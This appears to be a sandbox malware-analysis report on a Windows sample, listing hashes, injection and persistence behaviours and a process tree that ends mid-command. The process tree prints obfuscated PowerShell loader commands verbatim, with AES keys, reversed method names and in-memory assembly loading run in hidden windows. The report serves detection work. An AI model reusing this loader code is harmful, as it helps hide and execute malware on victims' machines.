154e25a046f1f9604edd46c621d037753819c4e5bca9f147c08eab91fd19ef4d

Analysis

max time kernel
36s
max time network
112s
platform
windows10-2004_x64
resource
win10v2004-20230703-en
resource tags

arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
submitted
08/07/2023, 20:31

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

0DACC9DE5E9AFF7B06742BDBC0407F8F.exe
Size

8KB
MD5

0dacc9de5e9aff7b06742bdbc0407f8f
SHA1

79d005840270c90d5723869d81f88c5fbf5a2988
SHA256

154e25a046f1f9604edd46c621d037753819c4e5bca9f147c08eab91fd19ef4d
SHA512

23e233352ba1799b6c20a734bb0938b519ee6905748b6fadbac3a9adb0422149e5faa8b8d37a393448d5bed0b036edd6a54b64eecdc751088cd8262beea993db
SSDEEP

192:/jsfG576wSKHL5bXJLcecsn2f/LpLgLxZrjtXf35Djoi:/ofGdSgL5bZL5csQ/LpLgLxpZf35Djo

Score

10^/10

Malware Config

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

description	pid	Process	procid_target
PID 2908 created 612	2908	95659a76-330e-48b4-8630-323a0b583ae3.bat.exe	4
PID 3048 created 612	3048	$sxr-powershell.exe	4

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\Control Panel\International\Geo\Nation	0DACC9DE5E9AFF7B06742BDBC0407F8F.exe

Executes dropped EXE 3 IoCs

pid	Process
2908	95659a76-330e-48b4-8630-323a0b583ae3.bat.exe
3048	$sxr-powershell.exe
2352	$sxr-powershell.exe

Drops file in System32 directory 6 IoCs

description	ioc	Process
File created	C:\Windows\System32\ucrtbased.dll	95659a76-330e-48b4-8630-323a0b583ae3.bat.exe
File created	C:\Windows\System32\vcruntime140_1d.dll	95659a76-330e-48b4-8630-323a0b583ae3.bat.exe
File created	C:\Windows\System32\vcruntime140d.dll	95659a76-330e-48b4-8630-323a0b583ae3.bat.exe
File opened for modification	C:\Windows\System32\ucrtbased.dll	95659a76-330e-48b4-8630-323a0b583ae3.bat.exe
File opened for modification	C:\Windows\System32\vcruntime140_1d.dll	95659a76-330e-48b4-8630-323a0b583ae3.bat.exe
File opened for modification	C:\Windows\System32\vcruntime140d.dll	95659a76-330e-48b4-8630-323a0b583ae3.bat.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 2908 set thread context of 2816	2908	95659a76-330e-48b4-8630-323a0b583ae3.bat.exe	90
PID 3048 set thread context of 4668	3048	$sxr-powershell.exe	94

Drops file in Windows directory 6 IoCs

description	ioc	Process
File created	C:\Windows\$sxr-mshta.exe	95659a76-330e-48b4-8630-323a0b583ae3.bat.exe
File opened for modification	C:\Windows\$sxr-mshta.exe	95659a76-330e-48b4-8630-323a0b583ae3.bat.exe
File created	C:\Windows\$sxr-seroxen2\$sxr-Uni.bat	cmd.exe
File opened for modification	C:\Windows\$sxr-seroxen2\$sxr-Uni.bat	cmd.exe
File created	C:\Windows\$sxr-powershell.exe	95659a76-330e-48b4-8630-323a0b583ae3.bat.exe
File opened for modification	C:\Windows\$sxr-powershell.exe	95659a76-330e-48b4-8630-323a0b583ae3.bat.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Runs net.exe

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
2908	95659a76-330e-48b4-8630-323a0b583ae3.bat.exe
2908	95659a76-330e-48b4-8630-323a0b583ae3.bat.exe
2908	95659a76-330e-48b4-8630-323a0b583ae3.bat.exe
2816	dllhost.exe
2816	dllhost.exe
2816	dllhost.exe
2816	dllhost.exe
2908	95659a76-330e-48b4-8630-323a0b583ae3.bat.exe
2908	95659a76-330e-48b4-8630-323a0b583ae3.bat.exe
3048	$sxr-powershell.exe
3048	$sxr-powershell.exe
3048	$sxr-powershell.exe
3048	$sxr-powershell.exe
4668	dllhost.exe
4668	dllhost.exe
4668	dllhost.exe
4668	dllhost.exe
3048	$sxr-powershell.exe
3048	$sxr-powershell.exe
2352	$sxr-powershell.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

description	pid	Process
Token: SeDebugPrivilege	4416	0DACC9DE5E9AFF7B06742BDBC0407F8F.exe
Token: SeDebugPrivilege	2908	95659a76-330e-48b4-8630-323a0b583ae3.bat.exe
Token: SeDebugPrivilege	2908	95659a76-330e-48b4-8630-323a0b583ae3.bat.exe
Token: SeDebugPrivilege	2816	dllhost.exe
Token: SeDebugPrivilege	3048	$sxr-powershell.exe
Token: SeDebugPrivilege	3048	$sxr-powershell.exe
Token: SeDebugPrivilege	4668	dllhost.exe
Token: SeDebugPrivilege	2352	$sxr-powershell.exe

Suspicious use of WriteProcessMemory 26 IoCs

description	pid	Process	procid_target
PID 4416 wrote to memory of 3160	4416	0DACC9DE5E9AFF7B06742BDBC0407F8F.exe	85
PID 4416 wrote to memory of 3160	4416	0DACC9DE5E9AFF7B06742BDBC0407F8F.exe	85
PID 3160 wrote to memory of 3188	3160	cmd.exe	87
PID 3160 wrote to memory of 3188	3160	cmd.exe	87
PID 3188 wrote to memory of 4772	3188	net.exe	88
PID 3188 wrote to memory of 4772	3188	net.exe	88
PID 3160 wrote to memory of 2908	3160	cmd.exe	89
PID 3160 wrote to memory of 2908	3160	cmd.exe	89
PID 2908 wrote to memory of 2816	2908	95659a76-330e-48b4-8630-323a0b583ae3.bat.exe	90
PID 2908 wrote to memory of 2816	2908	95659a76-330e-48b4-8630-323a0b583ae3.bat.exe	90
PID 2908 wrote to memory of 2816	2908	95659a76-330e-48b4-8630-323a0b583ae3.bat.exe	90
PID 2908 wrote to memory of 2816	2908	95659a76-330e-48b4-8630-323a0b583ae3.bat.exe	90
PID 2908 wrote to memory of 2816	2908	95659a76-330e-48b4-8630-323a0b583ae3.bat.exe	90
PID 2908 wrote to memory of 2816	2908	95659a76-330e-48b4-8630-323a0b583ae3.bat.exe	90
PID 2908 wrote to memory of 2816	2908	95659a76-330e-48b4-8630-323a0b583ae3.bat.exe	90
PID 2908 wrote to memory of 3048	2908	95659a76-330e-48b4-8630-323a0b583ae3.bat.exe	93
PID 2908 wrote to memory of 3048	2908	95659a76-330e-48b4-8630-323a0b583ae3.bat.exe	93
PID 3048 wrote to memory of 4668	3048	$sxr-powershell.exe	94
PID 3048 wrote to memory of 4668	3048	$sxr-powershell.exe	94
PID 3048 wrote to memory of 4668	3048	$sxr-powershell.exe	94
PID 3048 wrote to memory of 4668	3048	$sxr-powershell.exe	94
PID 3048 wrote to memory of 4668	3048	$sxr-powershell.exe	94
PID 3048 wrote to memory of 4668	3048	$sxr-powershell.exe	94
PID 3048 wrote to memory of 4668	3048	$sxr-powershell.exe	94
PID 3048 wrote to memory of 2352	3048	$sxr-powershell.exe	96
PID 3048 wrote to memory of 2352	3048	$sxr-powershell.exe	96

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:612
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{ea7b5e3c-ff62-4b73-87c6-a25bc2a22839}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2816
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{62512f74-45c7-4f09-8c0b-cf7576a76e43}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4668
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{fef0442a-4469-48fa-9148-404ed6e6655d}
  2⤵
  PID:3496

C:\Users\Admin\AppData\Local\Temp\0DACC9DE5E9AFF7B06742BDBC0407F8F.exe
"C:\Users\Admin\AppData\Local\Temp\0DACC9DE5E9AFF7B06742BDBC0407F8F.exe"
1⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4416
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C cd /d %systemdrive% & C:\Users\Admin\AppData\Local\Temp\95659a76-330e-48b4-8630-323a0b583ae3.bat & exit
  2⤵
  - Drops file in Windows directory
  - Suspicious use of WriteProcessMemory
  PID:3160
- - C:\Windows\system32\net.exe
    net session
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3188
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 session
      4⤵
      PID:4772
- - C:\Users\Admin\AppData\Local\Temp\95659a76-330e-48b4-8630-323a0b583ae3.bat.exe
    "95659a76-330e-48b4-8630-323a0b583ae3.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function oaivM($myPoe){ $CZsUH=[System.Security.Cryptography.Aes]::Create(); $CZsUH.Mode=[System.Security.Cryptography.CipherMode]::CBC; $CZsUH.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $CZsUH.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yq+Zf+/Xlwd1bzzTJFdmk2PzHxMZexiaAcpua2TkdOw='); $CZsUH.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VjvWSvzOMCdiOVrsv1q6ZA=='); $NXPuk=$CZsUH.CreateDecryptor(); $return_var=$NXPuk.TransformFinalBlock($myPoe, 0, $myPoe.Length); $NXPuk.Dispose(); $CZsUH.Dispose(); $return_var;}function JJFPJ($myPoe){ $ziGsx=New-Object System.IO.MemoryStream(,$myPoe); $BZpym=New-Object System.IO.MemoryStream; $FSqNe=New-Object System.IO.Compression.GZipStream($ziGsx, [IO.Compression.CompressionMode]::Decompress); $FSqNe.CopyTo($BZpym); $FSqNe.Dispose(); $ziGsx.Dispose(); $BZpym.Dispose(); $BZpym.ToArray();}function iBkVP($myPoe,$gUuoh){ $XEvFy=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$myPoe); $uVxqb=$XEvFy.EntryPoint; $uVxqb.Invoke($null, $gUuoh);}$lQJVS=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\95659a76-330e-48b4-8630-323a0b583ae3.bat').Split([Environment]::NewLine);foreach ($wdXwY in $lQJVS) { if ($wdXwY.StartsWith(':: ')) { $eKPyG=$wdXwY.Substring(4); break; }}$DKqql=[string[]]$eKPyG.Split('\');$dkbuf=JJFPJ (oaivM ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($DKqql[0])));$LxbFQ=JJFPJ (oaivM ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($DKqql[1])));iBkVP $LxbFQ (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));iBkVP $dkbuf (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious use of SetThreadContext
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2908
  - - C:\Windows\$sxr-powershell.exe
      "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function CFVyh($KdaUW){ $JwIck=[System.Security.Cryptography.Aes]::Create(); $JwIck.Mode=[System.Security.Cryptography.CipherMode]::CBC; $JwIck.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $JwIck.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GgEBZeptozY62jAkTo+jN3b4xtsDXwxbnOTUogcAvBw='); $JwIck.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ev1lAkhwUvUJQwgybsyCjA=='); $tFvyD=$JwIck.('rotpyrceDetaerC'[-1..-15] -join '')(); $sPVmp=$tFvyD.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KdaUW, 0, $KdaUW.Length); $tFvyD.Dispose(); $JwIck.Dispose(); $sPVmp;}function eSpTb($KdaUW){ $gzRJf=New-Object System.IO.MemoryStream(,$KdaUW); $erjBR=New-Object System.IO.MemoryStream; $YTJEq=New-Object System.IO.Compression.GZipStream($gzRJf, [IO.Compression.CompressionMode]::Decompress); $YTJEq.CopyTo($erjBR); $YTJEq.Dispose(); $gzRJf.Dispose(); $erjBR.Dispose(); $erjBR.ToArray();}function XUxPX($KdaUW,$VfmPE){ $swWug=[System.Reflection.Assembly]::Load([byte[]]$KdaUW); $IzDHJ=$swWug.EntryPoint; $IzDHJ.Invoke($null, $VfmPE);}$JwIck1 = New-Object System.Security.Cryptography.AesManaged;$JwIck1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$JwIck1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$JwIck1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GgEBZeptozY62jAkTo+jN3b4xtsDXwxbnOTUogcAvBw=');$JwIck1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ev1lAkhwUvUJQwgybsyCjA==');$VBwss = $JwIck1.('rotpyrceDetaerC'[-1..-15] -join '')();$skMlQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OFvSdIwZZx8RLuOL/7s6IA==');$skMlQ = $VBwss.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($skMlQ, 0, $skMlQ.Length);$skMlQ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($skMlQ);$pWXap = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ai0YTVITjbQv5EkpWAyTBIejdgAQiTwZ+TEIFEAIIms=');$pWXap = $VBwss.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($pWXap, 0, $pWXap.Length);$pWXap = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($pWXap);$Tmohh = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/XhXgnrhlgXyBeYRnJyYVg==');$Tmohh = $VBwss.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Tmohh, 0, $Tmohh.Length);$Tmohh = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Tmohh);$YkTtg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qGipJyeBQPOVpWXEovjGNndmNoBOaXsqO4V1fzXSbstS0xNc9rDI2Fz0Qn7Fr/f9zhTBHFHB7/QGHGiIpDkePFW4SCBuXDxK+jQH0Bbb4TKDJdzqZAhQXvSvi8vCcOyxS1WenltC+bxX46m2Y13gW3jJbeKccyuTeLLyjtLkHN7AnAVTtWHbZAYOOIxnl6YmCjskvxHArGzvODfdovay2YWKxF2Ck1bV1wpFzSjUPVWv3E99hEMDoSSYEBZcOyTnZRec1UOS9dD7Vg5jytVhmXu4aqOSST7EjXMAtEd3jbysY4rRgpYNoSe0IMgDcX1RSGf6ejbcikpGOYKkhRJTaJrwfEqQ+54ql6n5AM1jTgrdrqK36S9W2RjoSn4+kicqiGVhxPj1VE2c6npL56ck0kh+F4dWqqmxP7HMFHlRoMA=');$YkTtg = $VBwss.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YkTtg, 0, $YkTtg.Length);$YkTtg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YkTtg);$zEbCm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('pDZyym8Y0n7IAIoqCiv0gw==');$zEbCm = $VBwss.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($zEbCm, 0, $zEbCm.Length);$zEbCm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($zEbCm);$YFzpY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5tnDHp1xGelMKXxrxixESg==');$YFzpY = $VBwss.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YFzpY, 0, $YFzpY.Length);$YFzpY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YFzpY);$eWmVF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('c21v8CobqumAmx03/nyhmg==');$eWmVF = $VBwss.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($eWmVF, 0, $eWmVF.Length);$eWmVF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($eWmVF);$idJwa = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YVY9E7Uz0hNGfNa8QPgcaQ==');$idJwa = $VBwss.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($idJwa, 0, $idJwa.Length);$idJwa = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($idJwa);$OfZFd = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('COEcC6uTglav9iQm+VF8zA==');$OfZFd = $VBwss.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OfZFd, 0, $OfZFd.Length);$OfZFd = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OfZFd);$skMlQ0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yaUiXVc0UnlobqWb71swgQ==');$skMlQ0 = $VBwss.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($skMlQ0, 0, $skMlQ0.Length);$skMlQ0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($skMlQ0);$skMlQ1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hhVxLzWeWtpjKQ0cB7x5Cg==');$skMlQ1 = $VBwss.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($skMlQ1, 0, $skMlQ1.Length);$skMlQ1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($skMlQ1);$skMlQ2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WI85lZpZp5Tx15m0RS5PPg==');$skMlQ2 = $VBwss.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($skMlQ2, 0, $skMlQ2.Length);$skMlQ2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($skMlQ2);$skMlQ3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yqSP41JG0dUcPxTg+O7DxQ==');$skMlQ3 = $VBwss.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($skMlQ3, 0, $skMlQ3.Length);$skMlQ3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($skMlQ3);$VBwss.Dispose();$JwIck1.Dispose();if (@(get-process -ea silentlycontinue $skMlQ3).count -gt 1) {exit};$hlRcm = [Microsoft.Win32.Registry]::$idJwa.$eWmVF($skMlQ).$YFzpY($pWXap);$NJeeA=[string[]]$hlRcm.Split('\');$OffIR=eSpTb(CFVyh([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($NJeeA[1])));XUxPX $OffIR (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$dTXkT = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($NJeeA[0]);$JwIck = New-Object System.Security.Cryptography.AesManaged;$JwIck.Mode = [System.Security.Cryptography.CipherMode]::CBC;$JwIck.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$JwIck.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GgEBZeptozY62jAkTo+jN3b4xtsDXwxbnOTUogcAvBw=');$JwIck.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ev1lAkhwUvUJQwgybsyCjA==');$tFvyD = $JwIck.('rotpyrceDetaerC'[-1..-15] -join '')();$dTXkT = $tFvyD.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dTXkT, 0, $dTXkT.Length);$tFvyD.Dispose();$JwIck.Dispose();$gzRJf = New-Object System.IO.MemoryStream(, $dTXkT);$erjBR = New-Object System.IO.MemoryStream;$YTJEq = New-Object System.IO.Compression.GZipStream($gzRJf, [IO.Compression.CompressionMode]::$skMlQ1);$YTJEq.$OfZFd($erjBR);$YTJEq.Dispose();$gzRJf.Dispose();$erjBR.Dispose();$dTXkT = $erjBR.ToArray();$rDmKa = $YkTtg | IEX;$swWug = $rDmKa::$skMlQ2($dTXkT);$IzDHJ = $swWug.EntryPoint;$IzDHJ.$skMlQ0($null, (, [string[]] ($Tmohh)))
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3048
    - - C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(3048).WaitForExit();[System.Threading.Thread]::Sleep(5000); function CFVyh($KdaUW){ $JwIck=[System.Security.Cryptography.Aes]::Create(); $JwIck.Mode=[System.Security.Cryptography.CipherMode]::CBC; $JwIck.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $JwIck.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GgEBZeptozY62jAkTo+jN3b4xtsDXwxbnOTUogcAvBw='); $JwIck.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ev1lAkhwUvUJQwgybsyCjA=='); $tFvyD=$JwIck.('rotpyrceDetaerC'[-1..-15] -join '')(); $sPVmp=$tFvyD.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KdaUW, 0, $KdaUW.Length); $tFvyD.Dispose(); $JwIck.Dispose(); $sPVmp;}function eSpTb($KdaUW){ $gzRJf=New-Object System.IO.MemoryStream(,$KdaUW); $erjBR=New-Object System.IO.MemoryStream; $YTJEq=New-Object System.IO.Compression.GZipStream($gzRJf, [IO.Compression.CompressionMode]::Decompress); $YTJEq.CopyTo($erjBR); $YTJEq.Dispose(); $gzRJf.Dispose(); $erjBR.Dispose(); $erjBR.ToArray();}function XUxPX($KdaUW,$VfmPE){ $swWug=[System.Reflection.Assembly]::Load([byte[]]$KdaUW); $IzDHJ=$swWug.EntryPoint; $IzDHJ.Invoke($null, $VfmPE);}$JwIck1 = New-Object System.Security.Cryptography.AesManaged;$JwIck1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$JwIck1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$JwIck1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GgEBZeptozY62jAkTo+jN3b4xtsDXwxbnOTUogcAvBw=');$JwIck1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ev1lAkhwUvUJQwgybsyCjA==');$VBwss = $JwIck1.('rotpyrceDetaerC'[-1..-15] -join '')();$skMlQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OFvSdIwZZx8RLuOL/7s6IA==');$skMlQ = $VBwss.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($skMlQ, 0, $skMlQ.Length);$skMlQ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($skMlQ);$pWXap = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ai0YTVITjbQv5EkpWAyTBIejdgAQiTwZ+TEIFEAIIms=');$pWXap = $VBwss.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($pWXap, 0, $pWXap.Length);$pWXap = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($pWXap);$Tmohh = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/XhXgnrhlgXyBeYRnJyYVg==');$Tmohh = $VBwss.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Tmohh, 0, $Tmohh.Length);$Tmohh = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Tmohh);$YkTtg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qGipJyeBQPOVpWXEovjGNndmNoBOaXsqO4V1fzXSbstS0xNc9rDI2Fz0Qn7Fr/f9zhTBHFHB7/QGHGiIpDkePFW4SCBuXDxK+jQH0Bbb4TKDJdzqZAhQXvSvi8vCcOyxS1WenltC+bxX46m2Y13gW3jJbeKccyuTeLLyjtLkHN7AnAVTtWHbZAYOOIxnl6YmCjskvxHArGzvODfdovay2YWKxF2Ck1bV1wpFzSjUPVWv3E99hEMDoSSYEBZcOyTnZRec1UOS9dD7Vg5jytVhmXu4aqOSST7EjXMAtEd3jbysY4rRgpYNoSe0IMgDcX1RSGf6ejbcikpGOYKkhRJTaJrwfEqQ+54ql6n5AM1jTgrdrqK36S9W2RjoSn4+kicqiGVhxPj1VE2c6npL56ck0kh+F4dWqqmxP7HMFHlRoMA=');$YkTtg = $VBwss.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YkTtg, 0, $YkTtg.Length);$YkTtg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YkTtg);$zEbCm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('pDZyym8Y0n7IAIoqCiv0gw==');$zEbCm = $VBwss.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($zEbCm, 0, $zEbCm.Length);$zEbCm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($zEbCm);$YFzpY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5tnDHp1xGelMKXxrxixESg==');$YFzpY = $VBwss.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YFzpY, 0, $YFzpY.Length);$YFzpY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YFzpY);$eWmVF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('c21v8CobqumAmx03/nyhmg==');$eWmVF = $VBwss.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($eWmVF, 0, $eWmVF.Length);$eWmVF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($eWmVF);$idJwa = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YVY9E7Uz0hNGfNa8QPgcaQ==');$idJwa = $VBwss.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($idJwa, 0, $idJwa.Length);$idJwa = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($idJwa);$OfZFd = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('COEcC6uTglav9iQm+VF8zA==');$OfZFd = $VBwss.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OfZFd, 0, $OfZFd.Length);$OfZFd = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OfZFd);$skMlQ0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yaUiXVc0UnlobqWb71swgQ==');$skMlQ0 = $VBwss.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($skMlQ0, 0, $skMlQ0.Length);$skMlQ0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($skMlQ0);$skMlQ1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hhVxLzWeWtpjKQ0cB7x5Cg==');$skMlQ1 = $VBwss.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($skMlQ1, 0, $skMlQ1.Length);$skMlQ1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($skMlQ1);$skMlQ2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WI85lZpZp5Tx15m0RS5PPg==');$skMlQ2 = $VBwss.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($skMlQ2, 0, $skMlQ2.Length);$skMlQ2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($skMlQ2);$skMlQ3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yqSP41JG0dUcPxTg+O7DxQ==');$skMlQ3 = $VBwss.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($skMlQ3, 0, $skMlQ3.Length);$skMlQ3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($skMlQ3);$VBwss.Dispose();$JwIck1.Dispose();if (@(get-process -ea silentlycontinue $skMlQ3).count -gt 1) 